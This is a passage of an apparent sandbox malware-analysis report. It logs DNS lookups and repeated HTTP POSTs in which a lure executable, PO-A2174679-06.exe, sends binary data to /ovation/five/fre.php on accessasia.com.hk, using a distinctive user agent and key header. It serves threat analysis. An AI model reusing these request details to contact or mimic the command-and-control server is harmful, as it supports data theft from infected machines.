                            Feb 23, 2021 08:49:59.317658901 CET192.168.2.58.8.8.80x8433Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.153100967 CET192.168.2.58.8.8.80xff51Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.970994949 CET192.168.2.58.8.8.80x7427Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:02.258004904 CET192.168.2.58.8.8.80xb8cbStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:04.100541115 CET192.168.2.58.8.8.80x4116Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:05.398031950 CET192.168.2.58.8.8.80x6758Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Feb 23, 2021 08:49:20.727756977 CET8.8.8.8192.168.2.50xf8afNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Feb 23, 2021 08:49:22.859203100 CET8.8.8.8192.168.2.50x93ceNo error (0)hrf0ga.bn.files.1drv.combn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Feb 23, 2021 08:49:22.859203100 CET8.8.8.8192.168.2.50x93ceNo error (0)bn-files.fe.1drv.comodc-bn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Feb 23, 2021 08:49:25.141832113 CET8.8.8.8192.168.2.50xdb4eNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:26.124541044 CET8.8.8.8192.168.2.50xa0e7No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:27.337553024 CET8.8.8.8192.168.2.50x6790No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:29.017906904 CET8.8.8.8192.168.2.50xf96fNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:30.895327091 CET8.8.8.8192.168.2.50xd073No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:31.759629965 CET8.8.8.8192.168.2.50x33aaNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:32.725080013 CET8.8.8.8192.168.2.50xd44cNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:33.584520102 CET8.8.8.8192.168.2.50x22c5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:34.459041119 CET8.8.8.8192.168.2.50xb9caNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:35.333215952 CET8.8.8.8192.168.2.50x6b5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:36.212917089 CET8.8.8.8192.168.2.50x9a3aNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.066433907 CET8.8.8.8192.168.2.50x12d7No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.900213003 CET8.8.8.8192.168.2.50x25e9No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:40.853167057 CET8.8.8.8192.168.2.50x78ccNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:41.674030066 CET8.8.8.8192.168.2.50xc62bNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:42.540183067 CET8.8.8.8192.168.2.50x73a4No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:43.366683006 CET8.8.8.8192.168.2.50xda20No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:44.181931973 CET8.8.8.8192.168.2.50x3245No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:45.108205080 CET8.8.8.8192.168.2.50x9662No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.097811937 CET8.8.8.8192.168.2.50xd00No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.942615032 CET8.8.8.8192.168.2.50xb63fNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:47.807673931 CET8.8.8.8192.168.2.50x3762No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:48.686953068 CET8.8.8.8192.168.2.50xb0d5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:49.529510021 CET8.8.8.8192.168.2.50xef29No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:50.429570913 CET8.8.8.8192.168.2.50xa120No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:51.234113932 CET8.8.8.8192.168.2.50x26d4No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:52.021190882 CET8.8.8.8192.168.2.50x24a9No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:52.850966930 CET8.8.8.8192.168.2.50x4bcdNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:53.648022890 CET8.8.8.8192.168.2.50x1c9dNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:54.453586102 CET8.8.8.8192.168.2.50x275aNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:55.309329987 CET8.8.8.8192.168.2.50x1b29No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.093118906 CET8.8.8.8192.168.2.50x5404No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.923170090 CET8.8.8.8192.168.2.50xaf87No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:57.742845058 CET8.8.8.8192.168.2.50x135bNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:58.527405977 CET8.8.8.8192.168.2.50xeb5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:59.380300045 CET8.8.8.8192.168.2.50x8433No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.204687119 CET8.8.8.8192.168.2.50xff51No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:01.022571087 CET8.8.8.8192.168.2.50x7427No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:02.306612015 CET8.8.8.8192.168.2.50xb8cbNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:04.158838034 CET8.8.8.8192.168.2.50x4116No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:05.446899891 CET8.8.8.8192.168.2.50x6758No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • accessasia.com.hk

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.549732192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:25.317523003 CET5360OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 192
                            Connection: close
                            Feb 23, 2021 08:49:25.682240009 CET5361INHTTP/1.1 404 Not Found
                            Date: Tue, 23 Feb 2021 07:49:25 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 15
                            Content-Type: text/html
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.549733192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:26.296646118 CET5362OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 192
                            Connection: close
                            Feb 23, 2021 08:49:26.654206038 CET5362INHTTP/1.1 404 Not Found
                            Date: Tue, 23 Feb 2021 07:49:26 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 15
                            Content-Type: text/html
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.549743192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:38.359103918 CET5384OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:38.721246004 CET5385INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:38 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.549744192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:39.237473965 CET5386OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:39.593688965 CET5387INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:39 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            12192.168.2.549745192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:40.069118023 CET5387OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:40.433582067 CET5388INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:40 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            13192.168.2.549746192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:41.025088072 CET5389OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:41.377275944 CET5389INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            14192.168.2.549747192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:41.847378016 CET5390OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:42.205475092 CET5391INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            15192.168.2.549748192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:42.711982012 CET5392OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:43.067840099 CET5392INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:42 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            16192.168.2.549749192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:43.540302992 CET5393OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:43.895927906 CET5394INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:43 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            17192.168.2.549750192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:44.361483097 CET5395OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:44.730729103 CET5395INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:44 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            18192.168.2.549751192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:45.281075954 CET5396OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:45.682168007 CET5397INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:45 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            19192.168.2.549752192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:46.290244102 CET5397OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:46.657223940 CET5398INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:46 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.549734192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:27.514702082 CET5363OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:27.879473925 CET5364INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:27 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            20192.168.2.549753192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:47.113450050 CET5399OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:47.496956110 CET5426INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:47 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            21192.168.2.549755192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:47.991494894 CET5470OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:48.352315903 CET5501INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            22192.168.2.549759192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:48.867384911 CET5546OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:49.230602980 CET5557INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            23192.168.2.549761192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:49.698286057 CET5734OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:50.121752977 CET5747INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:49 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            24192.168.2.549763192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:50.602565050 CET5949OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:50.962508917 CET5958INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:50 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            25192.168.2.549765192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:51.403125048 CET6010OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:51.755176067 CET6011INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:51 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            26192.168.2.549766192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:52.189174891 CET6012OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:52.543189049 CET6012INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:52 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            27192.168.2.549767192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:53.017834902 CET6013OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:53.370479107 CET6014INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            28192.168.2.549768192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:53.820832968 CET6015OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:54.207701921 CET6016INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            29192.168.2.549769192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:54.628473043 CET6020OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:54.987622023 CET6024INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:54 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.549735192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:29.621978045 CET5365OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
